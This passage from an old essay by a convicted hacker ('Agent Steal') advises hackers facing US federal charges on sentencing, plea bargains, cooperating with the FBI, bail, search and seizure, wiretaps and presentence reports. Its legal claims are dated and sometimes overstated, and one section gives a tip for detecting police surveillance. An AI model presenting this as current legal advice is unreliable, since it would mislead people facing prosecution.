result we turned our hacking skills during the times of our incarceration&lt;br /&gt;
towards the study of criminal law and, ultimately, survival. Having filed&lt;br /&gt;
our own motions, written our own briefs and endured life in prison, we now&lt;br /&gt;
pass this&lt;br /&gt;
knowledge back to the hacker community. Learn from our experiences... and&lt;br /&gt;
our mistakes.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Agent Steal&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; PART I - FEDERAL CRIMINAL LAW&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; A. THE BOTTOM LINE - RELEVANT CONDUCT&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
For those of you with a short G-phile attention span I'm going to cover the&lt;br /&gt;
single most important topic first. This is probably the most substantial&lt;br /&gt;
misunderstanding of the present criminal justice system. The subject I am&lt;br /&gt;
talking about is referred to in legal circles as "relevant conduct." It's a&lt;br /&gt;
bit complex and I will get into this. However, I have to make his crystal&lt;br /&gt;
clear so that it will stick in your heads. It boils down to two concepts:&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; I. ONCE YOU ARE FOUND GUILTY OF EVEN ONE COUNT, EVERY COUNT WILL BE USED&lt;br /&gt;
TO CALCULATE YOUR SENTENCE&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Regardless of whether you plea bargain to one count or 100, your sentence&lt;br /&gt;
will be the same. This is assuming we are talking about hacking, code&lt;br /&gt;
abuse, carding, computer trespass, property theft, etc. All of these are&lt;br /&gt;
treated the same. Other crimes you committed (but were not charged with)&lt;br /&gt;
will also be used to calculate your sentence. You do not have to be proven&lt;br /&gt;
guilty of every act. As long as it appears that you were responsible, or&lt;br /&gt;
someone says you were, then it can be used against you. I know this sounds&lt;br /&gt;
insane , but it's true; it's the preponderance of evidence standard for&lt;br /&gt;
relevant conduct. This practice includes using illegally seized evidence&lt;br /&gt;
and acquittals as information in increasing the length of your sentence.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; II. YOUR SENTENCE WILL BE BASED ON THE TOTAL MONETARY LOSS&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The Feds use a sentencing table to calculate your sentence. It's simple;&lt;br /&gt;
More Money = More Time. It doesn't matter if you tried to break in 10 times&lt;br /&gt;
or 10,000 times. Each one could be a count but it's the loss that matters.&lt;br /&gt;
And an unsuccessful attempt is treated the same as a completed crime. It&lt;br /&gt;
also doesn't matter if you tried to break into one company's computer or&lt;br /&gt;
10. The government will quite simply add all of the estimated loss figures&lt;br /&gt;
up, and then refer to the sentencing table.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; B. PREPARING FOR TRIAL&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
I've been trying to be overly simplistic with my explanation. The United&lt;br /&gt;
States Sentencing Guidelines (U.S.S.G.), are in fact quite complex. So much&lt;br /&gt;
so that special law firms are forming that deal only with sentencing. If&lt;br /&gt;
you get busted, I would highly recommend hiring one. In some cases it might&lt;br /&gt;
be wise to avoid hiring a trial attorney and go straight to one of these&lt;br /&gt;
"Post Conviction Specialists." Save your money, plead out, do your time.&lt;br /&gt;
This may sound a little harsh, but considering the fact that the U.S.&lt;br /&gt;
Attorney's Office has a 95% conviction rate, it may be sage advice.&lt;br /&gt;
However, I don't want to gloss over the importance of a ready for trial&lt;br /&gt;
posturing. If you have a strong trial attorney, and have a strong case, it&lt;br /&gt;
will go a long way towards good plea bargain negotiations.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; C. PLEA AGREEMENTS AND ATTORNEYS&lt;br /&gt;
&lt;br /&gt;
Your attorney can be your worst foe or your finest advocate. Finding the&lt;br /&gt;
proper one can be a difficult task. Costs will vary and typically the&lt;br /&gt;
attorney asks you how much cash you can raise and then says, "that amount&lt;br /&gt;
will be fine". In actuality a simple plea and sentencing should run you&lt;br /&gt;
around $15,000. Trial fees can easily soar into the 6 figure category. And&lt;br /&gt;
finally, a post conviction specialist will charge $5000 to $15,000 to&lt;br /&gt;
handle your sentencing presentation with final arguments.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
You may however, find yourself at the mercy of The Public Defenders Office.&lt;br /&gt;
Usually they are worthless, occasionally you'll find one that will fight&lt;br /&gt;
for you. Essentially it's a crap shoot. All I can say is if you don't like&lt;br /&gt;
the one you have, fire them and hope you get appointed a better one. If&lt;br /&gt;
you can scrape together $5000 for a sentencing (post conviction) specialist&lt;br /&gt;
to work with your public defender I would highly recommend it. This&lt;br /&gt;
specialist will make certain the judge sees the whole picture and will&lt;br /&gt;
argue in the most effective manner for a light or reasonable sentence. Do&lt;br /&gt;
not rely on your public defender to thoroughly present your case. Your&lt;br /&gt;
sentencing hearing is going to flash by so fast you'll walk out of the&lt;br /&gt;
court room dizzy. You and your defense team need to go into that hearing&lt;br /&gt;
fully prepared, having already filed a sentencing memorandum.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The plea agreement you sign is going to affect you and your case well after&lt;br /&gt;
you are sentenced. Plea agreements can be tricky business and if you are&lt;br /&gt;
not careful or are in a bad defense position (the case against you is&lt;br /&gt;
strong), your agreement may get the best of you. There are many issues in a&lt;br /&gt;
plea to negotiate over. But essentially my advice would be to avoid signing&lt;br /&gt;
away your right to appeal. Once you get to a real prison with real&lt;br /&gt;
jailhouse lawyers you will find out how bad you got screwed. That issue&lt;br /&gt;
notwithstanding, you are most likely going to want to appeal. This being&lt;br /&gt;
the case you need to remember two things: bring all your appealable issues&lt;br /&gt;
up at sentencing and file a notice of appeal within 10 days of your&lt;br /&gt;
sentencing. Snooze and loose.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
I should however, mention that you can appeal some issues even though you&lt;br /&gt;
signed away your rights to appeal. For example, you can not sign away your&lt;br /&gt;
right to appeal an illegal sentence. If the judge orders something that is&lt;br /&gt;
not permissible by statute, you then have a constitutional right to appeal&lt;br /&gt;
your sentence.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
I will close this subpart with a prison joke. Q: How can you tell when your&lt;br /&gt;
attorney is lying? A: You can see his lips moving.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; D. CONSPIRACY&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Whatever happened to getting off on a technicality? I'm sorry to say those&lt;br /&gt;
days are gone, left only to the movies. The courts generally dismiss many&lt;br /&gt;
arguments as "harmless error" or "the government acted in good faith". The&lt;br /&gt;
most alarming trend, and surely the root of the prosecutions success, are&lt;br /&gt;
the liberally worded conspiracy laws. Quite simply, if two or more people&lt;br /&gt;
plan to do something illegal, then one of them does something in&lt;br /&gt;
furtherance of the objective (even something legal), then it's a crime.&lt;br /&gt;
Yes, it's true. In America it's illegal to simply talk about committing a&lt;br /&gt;
crime. Paging Mr. Orwell. Hello?&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Here's a hypothetical example to clarify this. Bill G. and Marc A. are&lt;br /&gt;
hackers (can you imagine?) Bill and Marc are talking on the phone and&lt;br /&gt;
unbeknownst to them the FBI is recording the call. They talk about hacking&lt;br /&gt;
into Apple's mainframe and erasing the prototype of the new Apple Web&lt;br /&gt;
Browser. Later that day, Marc does some legitimate research to find out&lt;br /&gt;
what type of mainframe and operating system Apple uses. The next morning,&lt;br /&gt;
the Feds raid Marc's house and seize everything that has wires. Bill and&lt;br /&gt;
Marc go to trial and spend millions to defend themselves. They are both&lt;br /&gt;
found guilty of conspiracy to commit unauthorized access to a computer system.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; E. SENTENCING&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
At this point it is up to the probation department to prepare a report for&lt;br /&gt;
the court. It is their responsibility to calculate the loss and identify&lt;br /&gt;
any aggravating or mitigating circumstances. Apple Computer Corporation&lt;br /&gt;
estimates that if Bill and M arc would have been successful it would have&lt;br /&gt;
resulted in a loss of $2 million. This is the figure the court will use.&lt;br /&gt;
Based on this basic scenario our dynamic duo would receive roughly&lt;br /&gt;
three-year sentences.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
As I mentioned, sentencing is complex and many factors can decrease or&lt;br /&gt;
increase a sentence, usually the latter. Let's say that the FBI also found&lt;br /&gt;
a file on Marc's computer with 50,000 unauthorized account numbers and&lt;br /&gt;
passwords to The Microsoft Network. Even if the FBI does not charge him&lt;br /&gt;
with this, it could be used to increase his sentence. Generally the&lt;br /&gt;
government places a $200-per-account attempted loss on things of this&lt;br /&gt;
nature (i.e. credit card numbers and passwords = access devices). This&lt;br /&gt;
makes for a $10 million loss. Coupled with the $2 million from Apple, Marc&lt;br /&gt;
is going away for about nine years. Fortunately there is a Federal Prison&lt;br /&gt;
not too far from Redmond, WA so Bill could come visit him.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Some of the other factors to be used in the calculation of a sentence might&lt;br /&gt;
include the following: past criminal record, how big your role in the&lt;br /&gt;
offense was, mental disabilities, whether or not you were on probation at&lt;br /&gt;
the time of the offense, if any weapons were used, if any threats were&lt;br /&gt;
used, if your name is Kevin Mitnick (heh), if an elderly person was&lt;br /&gt;
victimized, if you took advantage of your employment position, if you are&lt;br /&gt;
highly trained and used your special skill, if you cooperated with the&lt;br /&gt;
authorities, if you show remorse, if you went to trial, etc.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
These are just some of the many factors that could either increase or&lt;br /&gt;
decrease a sentence. It would be beyond the scope of this article to cover&lt;br /&gt;
the U.S.S.G. in complete detail. I do feel that I have skipped over some&lt;br /&gt;
significant issues. Neverthele ss, if you remember my two main points in&lt;br /&gt;
addition to how the conspiracy law works, you'll be a long way ahead in&lt;br /&gt;
protecting yourself.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; F. USE OF A SPECIAL SKILL&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The only specific "sentencing enhancement" I would like to cover would be&lt;br /&gt;
one that I am responsible for setting a precedent with. In U.S. v Petersen,&lt;br /&gt;
98 F.3d. 502, 9th Cir., the United States Court of Appeals held that some&lt;br /&gt;
computer hackers may qualify for the special skill enhancement. What this&lt;br /&gt;
generally means is a 6 to 24 month increase in a sentence. In my case it&lt;br /&gt;
added eight months to my 33-month sentence bringing it to 41 months.&lt;br /&gt;
Essentially the court stated that since I used my "sophisticated" hacking&lt;br /&gt;
skills towards a legitimate end as a computer security consultant, then the&lt;br /&gt;
enhancement applies. It's ironic that if I were to have remained strictly a&lt;br /&gt;
criminal hacker then I would have served less time.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The moral of the story is that the government will find ways to give you as&lt;br /&gt;
much time as they want to. The U.S.S.G. came into effect in 1987 in an&lt;br /&gt;
attempt to eliminate disparity in sentencing. Defendants with similar&lt;br /&gt;
crimes and similar backgrounds would often receive different sentences.&lt;br /&gt;
Unfortunately, this practice still continues. The U.S.S.G. are indeed a&lt;br /&gt;
failure.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; G. GETTING BAIL&lt;br /&gt;
&lt;br /&gt;
In the past, the Feds might simply have executed their raid and then left&lt;br /&gt;
without arresting you. Presently this method will be the exception rather&lt;br /&gt;
than the rule and it is more likely that you will be taken into custody at&lt;br /&gt;
the time of the raid. Chances are also good that you will not be released&lt;br /&gt;
on bail. This is part of the government's plan to break you down and win&lt;br /&gt;
their case. If they can find any reason to deny you bail they will. In&lt;br /&gt;
order to qualify for bail, you must meet the following criteri a:&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; - You must be a resident of the jurisdiction in which you were arrested.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; - You must be gainfully employed or have family ties to the area.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; - You cannot have a history of failure to appear or escape.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; - You cannot be considered a danger or threat to the community.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; In addition, your bail can be denied for the following reasons:&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; - Someone came forward and stated to the court that you said you would&lt;br /&gt;
flee if released.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; - Your sentence will be long if convicted.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; - You have a prior criminal history.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; - You have pending charges in another jurisdiction.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
What results from all this "bail reform" is that only about 20% of persons&lt;br /&gt;
arrested make bail. On top of that it takes 1-3 weeks to process your bail&lt;br /&gt;
papers when property is involved in securing your bond.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Now you're in jail, more specifically you are either in an administrative&lt;br /&gt;
holding facility or a county jail that has a contract with the Feds to hold&lt;br /&gt;
their prisoners. Pray that you are in a large enough city to justify its&lt;br /&gt;
own Federal Detention Center. County jails are typically the last place you&lt;br /&gt;
would want to be.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; H. STATE VS. FEDERAL CHARGES&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
In some cases you will be facing state charges with the possibility of the&lt;br /&gt;
Feds "picking them up." You may even be able to nudge the Feds into&lt;br /&gt;
indicting you. This is a tough decision. With the state you will do&lt;br /&gt;
considerably less time, but will face a tougher crowd and conditions in&lt;br /&gt;
prison. Granted Federal Prisons can be violent too, but generally as a&lt;br /&gt;
non-violent white collar criminal you will eventually be placed into an&lt;br /&gt;
environment with other low security inmates. More on this later.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Until you are sentenced, you will remain as a "pretrial inmate" in general&lt;br /&gt;
population with other inmates. Some of the other inmates will be&lt;br /&gt;
predatorial but the Feds do not tolerate much nonsense. If someone acts up,&lt;br /&gt;
they'll get thrown in the hole. If they continue to pose a threat to the&lt;br /&gt;
inmate population, they will be left in segregation (the hole).&lt;br /&gt;
Occasionally inmates that are at risk or that have been threatened will be&lt;br /&gt;
placed in segregation. This isn't really to protect the inmate. It is to pr&lt;br /&gt;
otect the prison from a lawsuit should the inmate get injured.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; I. COOPERATING&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Naturally when you are first arrested the suits will want to talk to you.&lt;br /&gt;
First at your residence and, if you appear to be talkative, they will take&lt;br /&gt;
you back to their offices for an extended chat and a cup of coffee. My&lt;br /&gt;
advice at this point is tried and true and we've all heard it before:&lt;br /&gt;
remain silent and ask to speak with an attorney. Regardless of what the&lt;br /&gt;
situation is, or how you plan to proceed, there is nothing you can say that&lt;br /&gt;
will help you. Nothing. Even if you know that you are going to cooperate,&lt;br /&gt;
this is not the time.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
This is obviously a controversial subject, but the fact of the matter is&lt;br /&gt;
roughly 80% of all defendants eventually confess and implicate others. This&lt;br /&gt;
trend stems from the extremely long sentences the Feds are handing out&lt;br /&gt;
these days. Not many people want to do 10 to 20 years to save their&lt;br /&gt;
buddies' hides when they could be doing 3 to 5. This is a decision each&lt;br /&gt;
individual needs to make. My only advice would be to save your close&lt;br /&gt;
friends and family. Anyone else is fair game. In the prison system the&lt;br /&gt;
blacks have a saying "Getting down first." It's no secret that the first&lt;br /&gt;
defendant in a conspiracy is usually going to get the best deal. I've even&lt;br /&gt;
seen situations where the big fish turned in all his little fish and&lt;br /&gt;
eceived 40% off his sentence.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Incidently, being debriefed or interrogated by the Feds can be an ordeal in&lt;br /&gt;
itself. I would -highly- reccommend reading up on interrogation techniques&lt;br /&gt;
ahead of time. Once you know their methods it will be all quite transparent&lt;br /&gt;
to you and the debriefing goes much more smoothly.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
When you make a deal with the government you're making a deal with the&lt;br /&gt;
devil himself. If you make any mistakes they will renege on the deal and&lt;br /&gt;
you'll get nothing. On some occasions the government will trick you into&lt;br /&gt;
thinking they want you to cooperate when they are not really interested in&lt;br /&gt;
anything you have to say. They just want you to plead guilty. When you sign&lt;br /&gt;
the cooperation agreement there are no set promises as to how much of a&lt;br /&gt;
sentence reduction you will receive. That is to be decided after your&lt;br /&gt;
testimony, etc. and at the time of sentencing. It's entirely up to the&lt;br /&gt;
judge. However, the prosecution makes the recommendation and the judge&lt;br /&gt;
generally goes along with it. In fact, if the prosecution does not motion&lt;br /&gt;
the court for your "downward departure" the courts' hands are tied and you&lt;br /&gt;
get no break.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
As you can see, cooperating is a tricky business. Most people, particularly&lt;br /&gt;
those who have never spent a day in jail, will tell you not to cooperate.&lt;br /&gt;
"Don't snitch." This is a noble stance to take. However, in some situations&lt;br /&gt;
it is just plain stupid. Saving someone's ass who would easily do the same&lt;br /&gt;
to you is a tough call. It's something that needs careful consideration.&lt;br /&gt;
Like I said, save your friends then do what you have to do to get out of&lt;br /&gt;
prison and on with your life.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
I'm happy to say that I was able to avoid involving my good friends and a&lt;br /&gt;
former employer in the massive investigation that surrounded my case. It&lt;br /&gt;
wasn't easy. I had to walk a fine line. Many of you probably know that I&lt;br /&gt;
(Agent Steal) went to work for the FBI after I was arrested. I was&lt;br /&gt;
responsible for teaching several agents about hacking and the culture. What&lt;br /&gt;
many of you don't know is that I had close FBI ties prior to my arrest. I&lt;br /&gt;
was involved in hacking for over 15 years and had worked as a comp uter&lt;br /&gt;
security consultant. That is why I was given that opportunity. It is&lt;br /&gt;
unlikely however, that we will see many more of these types of arrangements&lt;br /&gt;
in the future. Our relationship ran afoul, mostly due to their passive&lt;br /&gt;
negligence and lack of experience in dealing with hackers. The government&lt;br /&gt;
in general now has their own resources, experience, and undercover agents&lt;br /&gt;
within the community. They no longer need hackers to show them the ropes or&lt;br /&gt;
the latest security hole.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Nevertheless, if you are in the position to tell the Feds something they&lt;br /&gt;
don't know and help them build a case against someone, you may qualify for&lt;br /&gt;
a sentence reduction. The typical range is 20% to 70%. Usually it's around&lt;br /&gt;
35% to 50%.&lt;br /&gt;
Sometimes you may find yourself at the end of the prosecutorial food chain&lt;br /&gt;
and the government will not let you cooperate. Kevin Mitnick would be a&lt;br /&gt;
good example of this. Even if he wanted to roll over, I doubt it would get&lt;br /&gt;
him much. He's just too big of a fish, too much media. My final advice in&lt;br /&gt;
this matter is get the deal in writing before you start cooperating.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The Feds also like it when you "come clean" and accept responsibility.&lt;br /&gt;
There is a provision in the Sentencing Guidelines, 3E1.1, that knocks a&lt;br /&gt;
little bit of time off if you confess to your crime, plead guilty and show&lt;br /&gt;
remorse. If you go to trial, typically you will not qualify for this&lt;br /&gt;
"acceptance of responsibility" and your sentence will be longer.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; J. STILL THINKING ABOUT TRIAL&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
Many hackers may remember the Craig Neidorf case over the famous 911 System&lt;br /&gt;
Operation documents. Craig won his case when it was discovered that the&lt;br /&gt;
manual in question, that he had published in Phrack magazine, was not&lt;br /&gt;
proprietary as claimed but available publicly from AT&amp;amp;T. It was an egg in&lt;br /&gt;
the face day for the Secret Service.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Don't be misled by this. The government learned a lot from this fiasco and&lt;br /&gt;
even with the laudable support from the EFF, Craig narrowly thwarted off a&lt;br /&gt;
conviction. Regardless, it was a trying experience (no pun intended) for&lt;br /&gt;
him and his attorneys. Th e point I'm trying to make is that it's tough to&lt;br /&gt;
beat the Feds. They play dirty and will do just about anything, including&lt;br /&gt;
lie, to win their case. If you want to really win you need to know how they&lt;br /&gt;
build a case in the first place.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; K. SEARCH AND SEIZURE&lt;br /&gt;
&lt;br /&gt;
There is a document entitled "Federal Guidelines For Searching And Seizing&lt;br /&gt;
Computers." It first came to my attention when it was published in the&lt;br /&gt;
12-21-94 edition of the Criminal Law Reporter by the Bureau of National&lt;br /&gt;
Affairs (Cite as 56 CRL 2023 ) . It's an intriguing collection of tips,&lt;br /&gt;
cases, mistakes and, in general, how to bust computer hackers. It's&lt;br /&gt;
recommended reading.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Search and seizure is an ever evolving jurisprudence. What's not&lt;br /&gt;
permissible today may, through some convoluted Supreme Court logic, be&lt;br /&gt;
permissible and legal tomorrow. Again, a complete treatment of this subject&lt;br /&gt;
is beyond the scope of this paper. But suffice it to say if a Federal agent&lt;br /&gt;
wants to walk right into your bedroom and seize all of your computer&lt;br /&gt;
equipment without a warrant he could do it by simply saying he had probable&lt;br /&gt;
cause (PC). PC is anything that gives him an inkling to believe you we re&lt;br /&gt;
committing a crime. Police have been known to find PC to search a car when&lt;br /&gt;
the trunk sat too low to the ground or the high beams were always on.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; L. SURVEILLANCE AND WIRETAPS&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Fortunately the Feds still have to show a little restraint when wielding&lt;br /&gt;
their wiretaps. It requires a court order and they have to show that there&lt;br /&gt;
is no other way to obtain the information they seek, a last resort if you&lt;br /&gt;
will. Wiretaps are also expensive to operate. They have to lease lines from&lt;br /&gt;
the phone company, pay agents to monitor it 24 hours a day and then&lt;br /&gt;
transcribe it. If we are talking about a data tap, there are additional&lt;br /&gt;
costs. Expensive interception/translation equipment must be in place to&lt;br /&gt;
negotiate the various modem speeds. Then the data has to be stored,&lt;br /&gt;
deciphered, decompressed, formatted, protocoled, etc. It's a daunting task&lt;br /&gt;
and usually reserved for only the highest profile cases. If the Feds can&lt;br /&gt;
seize the data from any other so urce, like the service provider or victim,&lt;br /&gt;
they will take that route. I don't know what they hate worse though, asking&lt;br /&gt;
for outside help or wasting valuable internal resources.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The simplest method is to enlist the help of an informant who will testify&lt;br /&gt;
"I saw him do it!," then obtain a search warrant to seize the evidence on&lt;br /&gt;
your computer. Ba da boom, ba da busted.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Other devices include a pen register which is a device that logs every&lt;br /&gt;
digit you dial on your phone and the length of the calls, both incoming and&lt;br /&gt;
outgoing. The phone companies keep racks of them at their security&lt;br /&gt;
departments. They can place one on your line within a day if they feel you&lt;br /&gt;
are defrauding them. They don't need a court order, but the Feds do.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
A trap, or trap and trace, is typically any method the phone company uses&lt;br /&gt;
to log every number that calls a particular number. This can be done on the&lt;br /&gt;
switching system level or via a billing database search. The Feds need a&lt;br /&gt;
court order for this information too. However, I've heard stories of&lt;br /&gt;
cooperative telco security investigations passing the information along to&lt;br /&gt;
an agent. Naturally that would be a "harmless error while acting in good&lt;br /&gt;
faith." (legal humor)&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
I'd love to tell you more about FBI wiretaps but this is as far as I can go&lt;br /&gt;
without pissing them off. Everything I've told you thus far is public&lt;br /&gt;
knowledge. So I think I'll stop here. If you really want to know more,&lt;br /&gt;
catch Kevin Poulsen (Dark Dante ) at a cocktail party, buy him a Coke and&lt;br /&gt;
he'll give you an earful. (hacker humor)&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
In closing this subpart I will say that most electronic surveillance is&lt;br /&gt;
backed up with at least part-time physical surveillance. The Feds are often&lt;br /&gt;
good at following people around. They like late model mid-sized American&lt;br /&gt;
cars, very stock, with no decals or bumper stickers. If you really want to&lt;br /&gt;
know if you're under surveillance, buy an Opto-electronics Scout or Xplorer&lt;br /&gt;
frequency counter. Hide it on your person, stick an ear plug in your ear&lt;br /&gt;
(for the Xplorer) and take it everywhere you go. If you he ar people&lt;br /&gt;
talking about you, or you continue to hear intermittent static (encrypted&lt;br /&gt;
speech), you probably have a problem.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; M. YOUR PRESENTENCE INVESTIGATION REPORT, PSI OR PSR&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
After you plead guilty you will be dragged from the quiet and comfort of&lt;br /&gt;
your prison cell to meet with a probation officer. This has absolutely&lt;br /&gt;
nothing to do with getting probation. Quite the contrary. The P.O. is&lt;br /&gt;
empowered by the court to prepare a complete and, in theory, unbiased&lt;br /&gt;
profile of the defendant. Everything from education, criminal history,&lt;br /&gt;
psychological behavior, offense characteristics plus more will be included&lt;br /&gt;
in this voluminous and painfully detailed report about your life. Every&lt;br /&gt;
little dirty scrap of information that makes you look like a sociopathic,&lt;br /&gt;
demon worshiping, loathsome criminal will be included in this report.&lt;br /&gt;
They'll put a few negative things in there as well.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
My advice is simple. Be careful what you tell them. Have your attorney&lt;br /&gt;
present and think about how what you say can be used against you. Here's an&lt;br /&gt;
example:&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
P.O.: Tell me about your education and what you like to do in your spare time.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Mr. Steal: I am preparing to enroll in my final year of college. In my&lt;br /&gt;
spare time I work for charity helping orphan children.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The PSR then reads "Mr. Steal has never completed his education and hangs&lt;br /&gt;
around with little children in his spare time."&lt;br /&gt;
&lt;br /&gt;
Get the picture?&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; J. PROCEEDING PRO SE&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Pro Se or Pro Per is when a defendant represents himself. A famous lawyer&lt;br /&gt;
once said "a man that represents himself has a fool for a client." Truer&lt;br /&gt;
words were never spoken. However, I can't stress how important it is to&lt;br /&gt;
fully understand the criminal justice system. Even if you have a great&lt;br /&gt;
attorney it's good to be able to keep an eye on him or even help out. An&lt;br /&gt;
educated client's help can be of enormous benefit to an attorney. They may&lt;br /&gt;
think you're a pain in the ass but it's your life. Take a hold of it.&lt;br /&gt;
Regardless, representing yourself is generally a mistake.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
However, after your appeal, when your court appointed attorney runs out on&lt;br /&gt;
you, or you have run out of funds, you will be forced to handle matters&lt;br /&gt;
yourself. At this point there are legal avenues, although quite bleak, for&lt;br /&gt;
post-conviction&lt;br /&gt;
relief.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
But I digress. The best place to start in understanding the legal system&lt;br /&gt;
lies in three inexpensive books. First the Federal Sentencing Guidelines&lt;br /&gt;
($14.00) and Federal Criminal Codes and Rules ($20.00) are available from&lt;br /&gt;
West Publishing at 800-328-9 352. I consider possession of these books to&lt;br /&gt;
be mandatory for any pretrial inmate. Second would be the Georgetown Law&lt;br /&gt;
Journal, available from Georgetown University Bookstore in Washington, DC.&lt;br /&gt;
The book sells for around $40.00 but if you write them a letter and tell&lt;br /&gt;
them you're a Pro Se litigant they will send it for free. And last but not&lt;br /&gt;
least the definitive Pro Se authority, "The Prisoners Self Help Litigation&lt;br /&gt;
Manual" &lt;br /&gt;
$29.95 ISBN 0-379-20831-8. Or try http://www.oceanalaw.com/books/n148.htm&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; O. EVIDENTIARY HEARING&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
If you disagree with some of the information presented in the presentence&lt;br /&gt;
report (PSR) you may be entitled to a special hearing. This can be&lt;br /&gt;
instrumental in lowering your sentence or correcting your PSR. One&lt;br /&gt;
important thing to know is that your PSR will follow you the whole time you&lt;br /&gt;
